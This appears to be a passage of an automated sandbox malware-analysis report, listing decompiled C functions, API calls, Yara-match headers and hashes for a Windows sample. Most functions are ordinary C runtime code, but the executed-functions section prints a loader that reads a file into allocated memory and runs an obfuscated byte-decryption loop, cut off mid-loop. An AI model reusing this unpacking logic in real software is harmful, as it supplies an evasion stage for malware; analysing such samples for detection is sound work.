                                                                                              									goto L9;
                                                                                              								}
                                                                                              							}
                                                                                              						}
                                                                                              					} else {
                                                                                              						_t128 = _t123 & 0x000000fb;
                                                                                              						_v16 =  *((intOrPtr*)(_t129 + _t115 + 0x2e));
                                                                                              						_push(2);
                                                                                              						_v15 = _t128;
                                                                                              						 *(_t129 + _t115 + 0x2d) = _t128;
                                                                                              						_push( &_v16);
                                                                                              						L8:
                                                                                              						_push( &_v28);
                                                                                              						_t93 = E00407222();
                                                                                              						_t139 = _t139 + 0xc;
                                                                                              						if(_t93 != 0xffffffff) {
                                                                                              							L9:
                                                                                              							_t133 =  &(_t133[1]);
                                                                                              							_t96 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
                                                                                              							_v56 = _t96;
                                                                                              							if(_t96 != 0) {
                                                                                              								if(WriteFile(_v44,  &_v24, _t96,  &_v36, 0) == 0) {
                                                                                              									L19:
                                                                                              									 *_t136 = GetLastError();
                                                                                              								} else {
                                                                                              									 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 8)) - _v52 + _t133;
                                                                                              									if(_v36 >= _v56) {
                                                                                              										if(_v31 != 0xa) {
                                                                                              											goto L16;
                                                                                              										} else {
                                                                                              											_t104 = 0xd;
                                                                                              											_v32 = _t104;
                                                                                              											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
                                                                                              												goto L19;
                                                                                              											} else {
                                                                                              												if(_v36 >= 1) {
                                                                                              													 *((intOrPtr*)(_t136 + 8)) =  *((intOrPtr*)(_t136 + 8)) + 1;
                                                                                              													 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
                                                                                              													goto L16;
                                                                                              												}
                                                                                              											}
                                                                                              										}
                                                                                              									}
                                                                                              								}
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              					goto L20;
                                                                                              					L16:
                                                                                              				}
                                                                                              				L20:
                                                                                              				E004018CC();
                                                                                              				return _t136;
                                                                                              			}

                                                                                              APIs
                                                                                              • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00408998,?,00000000,?,00000000,00000000), ref: 00408265
                                                                                              • __fassign.LIBCMT ref: 004082E0
                                                                                              • __fassign.LIBCMT ref: 004082FB
                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00408321
                                                                                              • WriteFile.KERNEL32(?,?,00000000,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408340
                                                                                              • WriteFile.KERNEL32(?,?,00000001,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408379
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000001.265732741.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000001.265812009.0000000000414000.00000040.00020000.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                              • String ID:
                                                                                              • API String ID: 1324828854-0
                                                                                              • Opcode ID: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
                                                                                              • Instruction ID: d35ea3bc0149cbeaf608d2e35f82b202305ea3b4574a465905668c698b2cd014
                                                                                              • Opcode Fuzzy Hash: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
                                                                                              • Instruction Fuzzy Hash: 2751C070900209EFCB10CFA8D985AEEBBF4EF49300F14816EE995F3391DA349941CB68
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 27%
                                                                                              			E00403632(void* __ecx, intOrPtr _a4) {
                                                                                              				signed int _v8;
                                                                                              				signed int _v12;
                                                                                              				signed int _t10;
                                                                                              				int _t12;
                                                                                              				int _t18;
                                                                                              				signed int _t20;
                                                                                              
                                                                                              				_t10 =  *0x412014; // 0x7e6e3832
                                                                                              				_v8 = _t10 ^ _t20;
                                                                                              				_v12 = _v12 & 0x00000000;
                                                                                              				_t12 =  &_v12;
                                                                                              				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
                                                                                              				if(_t12 != 0) {
                                                                                              					_t12 = GetProcAddress(_v12, "CorExitProcess");
                                                                                              					_t18 = _t12;
                                                                                              					if(_t18 != 0) {
                                                                                              						E0040C15C();
                                                                                              						_t12 =  *_t18(_a4);
                                                                                              					}
                                                                                              				}
                                                                                              				if(_v12 != 0) {
                                                                                              					_t12 = FreeLibrary(_v12);
                                                                                              				}
                                                                                              				E004018CC();
                                                                                              				return _t12;
                                                                                              			}

                                                                                              APIs
                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002), ref: 00403652
                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00403665
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002,00000000), ref: 00403688
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000001.265732741.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000001.265812009.0000000000414000.00000040.00020000.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                              • API String ID: 4061214504-1276376045
                                                                                              • Opcode ID: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
                                                                                              • Instruction ID: 2a5f1b52f49e2644cdc997ca28138b4c7ff7fe3d24fc8903f8dd75b8825c5772
                                                                                              • Opcode Fuzzy Hash: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
                                                                                              • Instruction Fuzzy Hash: D7F0A431A0020CFBDB109FA1DD49B9EBFB9EB04711F00427AF805B22A0DB754A40CA98
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 79%
                                                                                              			E004062B8(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
                                                                                              				signed int _v8;
                                                                                              				int _v12;
                                                                                              				char _v16;
                                                                                              				intOrPtr _v24;
                                                                                              				char _v28;
                                                                                              				void* _v40;
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				signed int _t34;
                                                                                              				signed int _t40;
                                                                                              				int _t45;
                                                                                              				int _t52;
                                                                                              				void* _t53;
                                                                                              				void* _t55;
                                                                                              				int _t57;
                                                                                              				signed int _t63;
                                                                                              				int _t67;
                                                                                              				short* _t71;
                                                                                              				signed int _t72;
                                                                                              				short* _t73;
                                                                                              
                                                                                              				_t34 =  *0x412014; // 0x7e6e3832
                                                                                              				_v8 = _t34 ^ _t72;
                                                                                              				_push(_t53);
                                                                                              				E00403F2B(_t53,  &_v28, __edx, _a4);
                                                                                              				_t57 = _a24;
                                                                                              				if(_t57 == 0) {
                                                                                              					_t52 =  *(_v24 + 8);
                                                                                              					_t57 = _t52;
                                                                                              					_a24 = _t52;
                                                                                              				}
                                                                                              				_t67 = 0;
                                                                                              				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
                                                                                              				_v12 = _t40;
                                                                                              				if(_t40 == 0) {
                                                                                              					L15:
                                                                                              					if(_v16 != 0) {
                                                                                              						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
                                                                                              					}
                                                                                              					E004018CC();
                                                                                              					return _t67;
                                                                                              				}
                                                                                              				_t55 = _t40 + _t40;
                                                                                              				_t17 = _t55 + 8; // 0x8
                                                                                              				asm("sbb eax, eax");
                                                                                              				if((_t17 & _t40) == 0) {
                                                                                              					_t71 = 0;
                                                                                              					L11:
                                                                                              					if(_t71 != 0) {
                                                                                              						E00402460(_t67, _t71, _t67, _t55);
                                                                                              						_t45 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t71, _v12);
                                                                                              						if(_t45 != 0) {
                                                                                              							_t67 = GetStringTypeW(_a8, _t71, _t45, _a20);
                                                                                              						}
                                                                                              					}
                                                                                              					L14:
                                                                                              					E004063D5(_t71);
                                                                                              					goto L15;
                                                                                              				}
                                                                                              				_t20 = _t55 + 8; // 0x8
                                                                                              				asm("sbb eax, eax");
                                                                                              				_t47 = _t40 & _t20;
                                                                                              				_t21 = _t55 + 8; // 0x8
                                                                                              				_t63 = _t21;
                                                                                              				if((_t40 & _t20) > 0x400) {
                                                                                              					asm("sbb eax, eax");
                                                                                              					_t71 = E00403E3D(_t63, _t47 & _t63);
                                                                                              					if(_t71 == 0) {
                                                                                              						goto L14;
                                                                                              					}
                                                                                              					 *_t71 = 0xdddd;
                                                                                              					L9:
                                                                                              					_t71 =  &(_t71[4]);
                                                                                              					goto L11;
                                                                                              				}
                                                                                              				asm("sbb eax, eax");
                                                                                              				E004018E0();
                                                                                              				_t71 = _t73;
                                                                                              				if(_t71 == 0) {
                                                                                              					goto L14;
                                                                                              				}
                                                                                              				 *_t71 = 0xcccc;
                                                                                              				goto L9;
                                                                                              			}

                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 00406305
                                                                                              • __alloca_probe_16.LIBCMT ref: 0040633D
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0040638E
                                                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 004063A0
                                                                                              • __freea.LIBCMT ref: 004063A9
                                                                                                • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000001.265732741.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000001.265812009.0000000000414000.00000040.00020000.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                              • String ID:
                                                                                              • API String ID: 313313983-0
                                                                                              • Opcode ID: 3668a24b8cc91a8edc8bb6444902db7ad8a914eb3222a5b1c35fe0f4f695b84c
                                                                                              • Instruction ID: a1348b344bfdb8beedea85c2379656fd8e164ea4191dcb9080565a587d22e55f
                                                                                              • Opcode Fuzzy Hash: 3668a24b8cc91a8edc8bb6444902db7ad8a914eb3222a5b1c35fe0f4f695b84c
                                                                                              • Instruction Fuzzy Hash: AE31B072A0020AABDF249F65DC85DAF7BA5EF40310B05423EFC05E6290E739CD65DB94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 95%
                                                                                              			E00405751(signed int _a4) {
                                                                                              				signed int _t9;
                                                                                              				void* _t13;
                                                                                              				signed int _t15;
                                                                                              				WCHAR* _t22;
                                                                                              				signed int _t24;
                                                                                              				signed int* _t25;
                                                                                              				void* _t27;
                                                                                              
                                                                                              				_t9 = _a4;
                                                                                              				_t25 = 0x412fc8 + _t9 * 4;
                                                                                              				_t24 =  *_t25;
                                                                                              				if(_t24 == 0) {
                                                                                              					_t22 =  *(0x40cd48 + _t9 * 4);
                                                                                              					_t27 = LoadLibraryExW(_t22, 0, 0x800);
                                                                                              					if(_t27 != 0) {
                                                                                              						L8:
                                                                                              						 *_t25 = _t27;
                                                                                              						if( *_t25 != 0) {
                                                                                              							FreeLibrary(_t27);
                                                                                              						}
                                                                                              						_t13 = _t27;
                                                                                              						L11:
                                                                                              						return _t13;
                                                                                              					}
                                                                                              					_t15 = GetLastError();
                                                                                              					if(_t15 != 0x57) {
                                                                                              						_t27 = 0;
                                                                                              					} else {
                                                                                              						_t15 = LoadLibraryExW(_t22, _t27, _t27);
                                                                                              						_t27 = _t15;
                                                                                              					}
                                                                                              					if(_t27 != 0) {
                                                                                              						goto L8;
                                                                                              					} else {
                                                                                              						 *_t25 = _t15 | 0xffffffff;
                                                                                              						_t13 = 0;
                                                                                              						goto L11;
                                                                                              					}
                                                                                              				}
                                                                                              				_t4 = _t24 + 1; // 0x7e6e3833
                                                                                              				asm("sbb eax, eax");
                                                                                              				return  ~_t4 & _t24;
                                                                                              			}

                                                                                              APIs
                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue), ref: 00405783
                                                                                              • GetLastError.KERNEL32(?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000,00000364,?,004043F2), ref: 0040578F
                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000), ref: 0040579D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000001.265732741.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000001.265812009.0000000000414000.00000040.00020000.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                              • String ID:
                                                                                              • API String ID: 3177248105-0
                                                                                              • Opcode ID: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
                                                                                              • Instruction ID: a071a87d579bf16c10ed97f701b3afe57148fc5a73c01e838bdae708b7fec84a
                                                                                              • Opcode Fuzzy Hash: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
                                                                                              • Instruction Fuzzy Hash: 2001AC36612622DBD7214BA89D84E577BA8EF45B61F100635FA05F72C0D734D811DEE8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 71%
                                                                                              			E00404320(void* __ebx, void* __ecx, void* __edx) {
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				intOrPtr _t2;
                                                                                              				void* _t3;
                                                                                              				void* _t4;
                                                                                              				intOrPtr _t9;
                                                                                              				void* _t11;
                                                                                              				void* _t20;
                                                                                              				void* _t21;
                                                                                              				void* _t23;
                                                                                              				void* _t25;
                                                                                              				void* _t27;
                                                                                              				void* _t29;
                                                                                              				void* _t31;
                                                                                              				void* _t32;
                                                                                              				long _t36;
                                                                                              				long _t37;
                                                                                              				void* _t40;
                                                                                              
                                                                                              				_t29 = __edx;
                                                                                              				_t23 = __ecx;
                                                                                              				_t20 = __ebx;
                                                                                              				_t36 = GetLastError();
                                                                                              				_t2 =  *0x412064; // 0xffffffff
                                                                                              				_t42 = _t2 - 0xffffffff;
                                                                                              				if(_t2 == 0xffffffff) {
                                                                                              					L2:
                                                                                              					_t3 = E00403ECE(_t23, 1, 0x364);
                                                                                              					_t31 = _t3;
                                                                                              					_pop(_t25);
                                                                                              					if(_t31 != 0) {
                                                                                              						_t4 = E004058CE(_t25, __eflags,  *0x412064, _t31);
                                                                                              						__eflags = _t4;
                                                                                              						if(_t4 != 0) {
                                                                                              							E00404192(_t25, _t31, 0x4132a4);
                                                                                              							E00403E03(0);
                                                                                              							_t40 = _t40 + 0xc;
                                                                                              							__eflags = _t31;
                                                                                              							if(_t31 == 0) {
                                                                                              								goto L9;
                                                                                              							} else {
                                                                                              								goto L8;
                                                                                              							}
                                                                                              						} else {
                                                                                              							_push(_t31);
                                                                                              							goto L4;
                                                                                              						}
                                                                                              					} else {
                                                                                              						_push(_t3);
                                                                                              						L4:
                                                                                              						E00403E03();
                                                                                              						_pop(_t25);
                                                                                              						L9:
                                                                                              						SetLastError(_t36);
                                                                                              						E00403E8B(_t20, _t29, _t31, _t36);
                                                                                              						asm("int3");
                                                                                              						_push(_t20);
                                                                                              						_push(_t36);
                                                                                              						_push(_t31);
                                                                                              						_t37 = GetLastError();
                                                                                              						_t21 = 0;
                                                                                              						_t9 =  *0x412064; // 0xffffffff
                                                                                              						_t45 = _t9 - 0xffffffff;
                                                                                              						if(_t9 == 0xffffffff) {
                                                                                              							L12:
                                                                                              							_t32 = E00403ECE(_t25, 1, 0x364);
                                                                                              							_pop(_t27);
                                                                                              							if(_t32 != 0) {
                                                                                              								_t11 = E004058CE(_t27, __eflags,  *0x412064, _t32);
                                                                                              								__eflags = _t11;
                                                                                              								if(_t11 != 0) {
                                                                                              									E00404192(_t27, _t32, 0x4132a4);
                                                                                              									E00403E03(_t21);
                                                                                              									__eflags = _t32;
                                                                                              									if(_t32 != 0) {
                                                                                              										goto L19;
                                                                                              									} else {
                                                                                              										goto L18;
                                                                                              									}
                                                                                              								} else {
                                                                                              									_push(_t32);
                                                                                              									goto L14;
                                                                                              								}
                                                                                              							} else {
                                                                                              								_push(_t21);
                                                                                              								L14:
                                                                                              								E00403E03();
                                                                                              								L18:
                                                                                              								SetLastError(_t37);
                                                                                              							}
                                                                                              						} else {
                                                                                              							_t32 = E00405878(_t25, _t45, _t9);
                                                                                              							if(_t32 != 0) {
                                                                                              								L19:
                                                                                              								SetLastError(_t37);
                                                                                              								_t21 = _t32;
                                                                                              							} else {
                                                                                              								goto L12;
                                                                                              							}
                                                                                              						}
                                                                                              						return _t21;
                                                                                              					}
                                                                                              				} else {
                                                                                              					_t31 = E00405878(_t23, _t42, _t2);
                                                                                              					if(_t31 != 0) {
                                                                                              						L8:
                                                                                              						SetLastError(_t36);
                                                                                              						return _t31;
                                                                                              					} else {
                                                                                              						goto L2;
                                                                                              					}
                                                                                              				}
                                                                                              			}






















                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,?,004037D2,?,?,004016EA,00000000,?,00410E40), ref: 00404324
                                                                                              • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 0040438C
                                                                                              • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 00404398
                                                                                              • _abort.LIBCMT ref: 0040439E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000001.265732741.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000001.265812009.0000000000414000.00000040.00020000.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$_abort
                                                                                              • String ID:
                                                                                              • API String ID: 88804580-0
                                                                                              • Opcode ID: 62ede4f37894db3567f5427a1490bbed1412223467fdb5f37ac402c07740c3c0
                                                                                              • Instruction ID: 10f1ed76ee289f7058500775698c1b2aead1ecf844b9f3100802fdeea25ad27f
                                                                                              • Opcode Fuzzy Hash: 62ede4f37894db3567f5427a1490bbed1412223467fdb5f37ac402c07740c3c0
                                                                                              • Instruction Fuzzy Hash: 75F0A976204701A6C21237769D0AB6B2A1ACBC1766F25423BFF18B22D1EF3CCD42859D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E004025BA() {
                                                                                              				void* _t4;
                                                                                              				void* _t8;
                                                                                              
                                                                                              				E00402AE5();
                                                                                              				E00402A79();
                                                                                              				if(E004027D9() != 0) {
                                                                                              					_t4 = E0040278B(_t8, __eflags);
                                                                                              					__eflags = _t4;
                                                                                              					if(_t4 != 0) {
                                                                                              						return 1;
                                                                                              					} else {
                                                                                              						E00402815();
                                                                                              						goto L1;
                                                                                              					}
                                                                                              				} else {
                                                                                              					L1:
                                                                                              					return 0;
                                                                                              				}
                                                                                              			}






                                                                                              APIs
                                                                                              • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 004025BA
                                                                                              • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 004025BF
                                                                                              • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 004025C4
                                                                                                • Part of subcall function 004027D9: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004027EA
                                                                                              • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 004025D9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000001.265732741.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000001.265812009.0000000000414000.00000040.00020000.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                              • String ID:
                                                                                              • API String ID: 1761009282-0
                                                                                              • Opcode ID: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                                                                                              • Instruction ID: 4128bea016199bb2a2d03f508bec19fe8aa18f4adc422371eefe93b2158e2da6
                                                                                              • Opcode Fuzzy Hash: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                                                                                              • Instruction Fuzzy Hash: E0C0024414014264DC6036B32F2E5AA235409A63CDBD458BBA951776C3ADFD044A553E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00405575() {
                                                                                              
                                                                                              				 *0x412e78 = GetCommandLineA();
                                                                                              				 *0x412e7c = GetCommandLineW();
                                                                                              				return 1;
                                                                                              			}




                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290361151.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CommandLine
                                                                                              • String ID: P3_
                                                                                              • API String ID: 3253501508-2621628151
                                                                                              • Opcode ID: 5876c0817ba34097e06c4a717b2c5bc39c627040ca7456eb6673a9cffb0a1105
                                                                                              • Instruction ID: 265b5206e6e9c5440433cfe38bbdb56a7b23962a2c49d0f47ff6119da82ef27c
                                                                                              • Opcode Fuzzy Hash: 5876c0817ba34097e06c4a717b2c5bc39c627040ca7456eb6673a9cffb0a1105
                                                                                              • Instruction Fuzzy Hash: 24B09278800300CFD7008FB0BB8C0843BA0B2382023A09175D511D2320D6F40060DF4C
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Executed Functions

                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,?,?,?,?,?,(0ro), ref: 6F7224DC
                                                                                              • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,?,(0ro,6F72218A,7FC6FA16,6F722349), ref: 6F722506
                                                                                              • ReadFile.KERNEL32(00000000,00000000,000000FF,?,00000000,?,?,?,?,?,?,?,?,(0ro,6F72218A,7FC6FA16), ref: 6F72251D
                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,(0ro,6F72218A,7FC6FA16,6F722349), ref: 6F72253F
                                                                                              • FindCloseChangeNotification.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,(0ro,6F72218A,7FC6FA16,6F722349,000000FF,00000000), ref: 6F7225B2
                                                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,(0ro,6F72218A,7FC6FA16,6F722349), ref: 6F7225BD
                                                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,(0ro,6F72218A,7FC6FA16,6F722349,000000FF), ref: 6F722608
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.310581494.000000006F722000.00000040.00020000.sdmp, Offset: 6F700000, based on PE: true
                                                                                              • Associated: 00000006.00000002.310482932.000000006F700000.00000002.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310491203.000000006F701000.00000020.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310547268.000000006F71B000.00000002.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310606640.000000006F724000.00000008.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310624074.000000006F726000.00000004.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310636916.000000006F72A000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                                                                                              • String ID: (0ro
                                                                                              • API String ID: 656311269-2695748320
                                                                                              • Opcode ID: af7b555d49f7dab9e8ba194529cc05e2405c0ec283943ac24b372fda9630fd69
                                                                                              • Instruction ID: aa329c8b34d054a5595b82577eb5309b362f034ce7fc7afc4051c60bec0e03ac
                                                                                              • Opcode Fuzzy Hash: af7b555d49f7dab9e8ba194529cc05e2405c0ec283943ac24b372fda9630fd69
                                                                                              • Instruction Fuzzy Hash: D5616B71E10608ABEB10DFA58A94BAEB7B5BF49710F108069E515EB390EB74DE01CB64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E6F70F530(void* __ecx) {
                                                                                              				_Unknown_base(*)()* _v8;
                                                                                              				_Unknown_base(*)()* _v12;
                                                                                              				intOrPtr _t12;
                                                                                              				char _t51;
                                                                                              				void* _t53;
                                                                                              				signed int _t89;
                                                                                              				signed int _t91;
                                                                                              				signed int _t123;
                                                                                              
                                                                                              				_t53 = __ecx;
                                                                                              				_v12 = GetProcAddress(LoadLibraryW(L"kernel32.dll"), "VirtualProtect");
                                                                                              				_v8 = GetProcAddress(LoadLibraryW(L"kernel32.dll"), "VirtualAlloc");
                                                                                              				 *0x6f727364 = VirtualAlloc(0, 0x11e1a300, 0x3000, 4);
                                                                                              				if( *0x6f727364 != 0) {
                                                                                              					_t12 =  *0x6f727364; // 0x2980000
                                                                                              					E6F70F900(_t53, _t12, 0x11e1a300);
                                                                                              					 *0x6f727360 = 0;
                                                                                              					while( *0x6f727360 < 0x13c5) {
                                                                                              						_t91 =  *0x6f727360; // 0x13c5
                                                                                              						_t4 =  &E6F722000 + _t91; // 0x6f000000
                                                                                              						 *0x6f727fe8 =  *_t4;
                                                                                              						 *0x6f727fe8 = ( *0x6f727fe8 & 0x000000ff) +  *0x6f727360;
                                                                                              						 *0x6f727fe8 =  !( *0x6f727fe8 & 0x000000ff);
                                                                                              						 *0x6f727fe8 = ( *0x6f727fe8 & 0x000000ff) +  *0x6f727360;
                                                                                              						 *0x6f727fe8 =  !( *0x6f727fe8 & 0x000000ff);
                                                                                              						 *0x6f727fe8 =  *0x6f727fe8 & 0x000000ff ^ 0x0000001b;
                                                                                              						 *0x6f727fe8 = ( *0x6f727fe8 & 0x000000ff) +  *0x6f727360;
                                                                                              						 *0x6f727fe8 = ( *0x6f727fe8 & 0x000000ff) >> 0x00000002 | ( *0x6f727fe8 & 0x000000ff) << 0x00000006;
                                                                                              						 *0x6f727fe8 =  !( *0x6f727fe8 & 0x000000ff);
                                                                                              						 *0x6f727fe8 = ( *0x6f727fe8 & 0x000000ff) + 0x63;
                                                                                              						 *0x6f727fe8 = ( *0x6f727fe8 & 0x000000ff) >> 0x00000005 | ( *0x6f727fe8 & 0x000000ff) << 0x00000003;
                                                                                              						 *0x6f727fe8 = ( *0x6f727fe8 & 0x000000ff) + 0xa2;
                                                                                              						 *0x6f727fe8 =  *0x6f727fe8 & 0x000000ff ^  *0x6f727360;
                                                                                              						 *0x6f727fe8 = ( *0x6f727fe8 & 0x000000ff) >> 0x00000005 | ( *0x6f727fe8 & 0x000000ff) << 0x00000003;
                                                                                              						 *0x6f727fe8 = ( *0x6f727fe8 & 0x000000ff) + 0x94;
                                                                                              						 *0x6f727fe8 =  !( *0x6f727fe8 & 0x000000ff);
                                                                                              						 *0x6f727fe8 = ( *0x6f727fe8 & 0x000000ff) +  *0x6f727360;
                                                                                              						 *0x6f727fe8 =  !( *0x6f727fe8 & 0x000000ff);
                                                                                              						 *0x6f727fe8 = ( *0x6f727fe8 & 0x000000ff) +  *0x6f727360;
                                                                                              						 *0x6f727fe8 =  ~( *0x6f727fe8 & 0x000000ff);
                                                                                              						 *0x6f727fe8 = ( *0x6f727fe8 & 0x000000ff) + 0x92;
                                                                                              						 *0x6f727fe8 =  !( *0x6f727fe8 & 0x000000ff);
                                                                                              						 *0x6f727fe8 = ( *0x6f727fe8 & 0x000000ff) >> 0x00000007 | ( *0x6f727fe8 & 0x000000ff) << 0x00000001;
                                                                                              						 *0x6f727fe8 =  *0x6f727fe8 & 0x000000ff ^  *0x6f727360;
                                                                                              						 *0x6f727fe8 =  ~( *0x6f727fe8 & 0x000000ff);
                                                                                              						 *0x6f727fe8 =  *0x6f727fe8 & 0x000000ff ^ 0x00000049;
                                                                                              						 *0x6f727fe8 = ( *0x6f727fe8 & 0x000000ff) - 0x6d;
                                                                                              						 *0x6f727fe8 =  !( *0x6f727fe8 & 0x000000ff);
                                                                                              						 *0x6f727fe8 =  *0x6f727fe8 & 0x000000ff ^ 0x00000098;
                                                                                              						 *0x6f727fe8 = ( *0x6f727fe8 & 0x000000ff) -  *0x6f727360;
                                                                                              						 *0x6f727fe8 =  !( *0x6f727fe8 & 0x000000ff);
                                                                                              						 *0x6f727fe8 = ( *0x6f727fe8 & 0x000000ff) -  *0x6f727360;
                                                                                              						 *0x6f727fe8 = ( *0x6f727fe8 & 0x000000ff) >> 0x00000003 | ( *0x6f727fe8 & 0x000000ff) << 0x00000005;
